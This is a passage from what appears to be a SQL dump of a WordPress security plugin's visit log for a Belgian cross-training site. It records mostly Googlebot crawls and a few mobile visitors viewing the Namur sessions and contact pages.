(78658, 1556374131.674123, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78659, 1556411506.106824, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78660, 1556460436.055621, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78661, 1556460436.580062, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78662, 1556472547.361707, 1123634971, 0, 0, 1, 0, 1, 'https://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78663, 1556472547.915664, 1123634971, 0, 1, 1, 0, 1, 'https://www2.crosstrainingcenter.be/.well-known/assetlinks.json', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78664, 1556528202.717774, 1123632582, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78665, 1556531500.787301, 632885948, 1, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1'),
(78666, 1556531503.266981, 632885948, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1'),
(78667, 1556531591.323245, 632885948, 1, 0, 0, 0, 0, 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1'),
(78668, 1556531609.232371, 632885948, 1, 0, 0, 0, 0, 'http://www2.crosstrainingcenter.be/contact/', 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1'),
(78669, 1556531611.821431, 632885948, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www2.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1'),
(78670, 1556596147.453011, 1123631564, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78671, 1556596147.904888, 1123631564, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78672, 1556743500.404487, 1123632582, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78673, 1556840084.373406, 1123632582, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78674, 1556930241.666256, 1123632582, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78675, 1556930242.132058, 1123632582, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78676, 1556965696.440526, 1123632582, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78677, 1557001446.537712, 1123632582, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78678, 1557037010.500120, 1123632582, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78679, 1557037010.935560, 1123632582, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78680, 1557553329.102676, 1123631291, 0, 0, 1, 0, 1, 'https://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78681, 1557553329.534353, 1123631291, 0, 1, 1, 0, 1, 'https://www2.crosstrainingcenter.be/.well-known/assetlinks.json', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78682, 1557559346.563888, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78683, 1557559347.070700, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78684, 1557594373.611756, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78685, 1557624860.051257, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78686, 1557660494.415767, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78687, 1557660494.917444, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78688, 1557835632.197014, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78689, 1557950340.437578, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78690, 1558170326.112007, 1123633948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78691, 1558170326.584727, 1123633948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78692, 1558170582.029249, 1123633948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78693, 1558172751.731025, 1123633948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78694, 1558214084.689941, 1123633948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78695, 1558253343.018455, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78696, 1558262319.616137, 1123631835, 0, 0, 1, 0, 1, 'https://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78697, 1558262320.044088, 1123631835, 0, 1, 1, 0, 1, 'https://www2.crosstrainingcenter.be/.well-known/assetlinks.json', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78698, 1558295544.688150, 1538515997, 1, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.com/', 'Mozilla/5.0 (Linux; Android 5.1.1; SM-G800F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.112 Mobile Safari/537.36'),
(78699, 1558295547.559886, 1538515997, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 5.1.1; SM-G800F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.112 Mobile Safari/537.36'),
(78700, 1558798589.414269, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78701, 1558798590.058568, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78702, 1558800458.026793, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78703, 1558806512.981017, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78704, 1558806566.451880, 1123631270, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78705, 1558870599.408127, 1123631564, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78706, 1558874380.498356, 1123631564, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78707, 1558906873.666409, 1123631564, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78708, 1558906874.157728, 1123631564, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(78709, 1558912256.069609, 1123631564, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78710, 1558942412.088141, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78711, 1558946039.098360, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78712, 1558977476.957625, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78713, 1559430232.915199, 1123633937, 0, 0, 1, 0, 1, 'https://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78714, 1559430233.354523, 1123633937, 0, 1, 1, 0, 1, 'https://www2.crosstrainingcenter.be/.well-known/assetlinks.json', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78715, 1559433636.919717, 1123633948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78716, 1559433637.378807, 1123633948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78717, 1559452418.573552, 1123633948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78718, 1559468198.104693, 1123633948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78719, 1559475974.669078, 1439284614, 1, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.com/', 'Mozilla/5.0 (Linux; Android 7.0; SAMSUNG SM-A310F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.2 Chrome/67.0.3396.87 Mobile Safari/537.36'),
(78720, 1559475976.774389, 1439284614, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 7.0; SAMSUNG SM-A310F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.2 Chrome/67.0.3396.87 Mobile Safari/537.36'),
(78721, 1559483902.771320, 1123633948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78722, 1559506253.580090, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78723, 1559548376.490307, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78724, 1559548379.061406, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78725, 1559566691.007962, 1837892844, 1, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Mobile/15E148 Safari/604.1'),
(78726, 1559566692.798548, 1837892844, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Mobile/15E148 Safari/604.1'),
(78727, 1559566731.320078, 1837892844, 1, 0, 0, 0, 0, 'http://www2.crosstrainingcenter.be/le-cross-training/', 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Mobile/15E148 Safari/604.1'),
(78728, 1559566732.599852, 1837892844, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www2.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Mobile/15E148 Safari/604.1'),
(78729, 1559566758.403600, 1837892844, 1, 0, 0, 0, 0, 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'http://www2.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Mobile/15E148 Safari/604.1'),
(78730, 1559896009.421875, 1123631564, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78731, 1559983024.221278, 1123631564, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78732, 1559983024.785565, 1123631564, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78733, 1559992946.393837, 1538574586, 1, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 8.1.0; SAMSUNG SM-T585 Build/M1AJQ) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.2 Chrome/67.0.3396.87 Safari/537.36'),
(78734, 1559992948.113533, 1538574586, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 8.1.0; SAMSUNG SM-T585 Build/M1AJQ) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.2 Chrome/67.0.3396.87 Safari/537.36'),
(78735, 1559992996.692545, 1538574586, 1, 0, 0, 0, 0, 'http://www2.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 8.1.0; SAMSUNG SM-T585 Build/M1AJQ) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.2 Chrome/67.0.3396.87 Safari/537.36'),
(78736, 1560040908.984683, 1123631564, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78737, 1560069875.848660, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78738, 1560075927.816438, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78739, 1560092975.460744, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78740, 1560105500.008693, 1584214706, 1, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.com/', 'Mozilla/5.0 (Linux; Android 8.0.0; SM-G930F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.67 Mobile Safari/537.36'),
(78741, 1560105501.531155, 1584214706, 0, 1, 0, 0, 1, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 8.0.0; SM-G930F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.67 Mobile Safari/537.36'),
(78742, 1560131607.769294, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78743, 1560164181.619236, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78744, 1560164182.109089, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78745, 1560168394.972539, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78746, 1560210589.420413, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78747, 1560214127.513103, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78748, 1560242269.389538, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78749, 1560279682.020007, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78750, 1560279702.810509, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
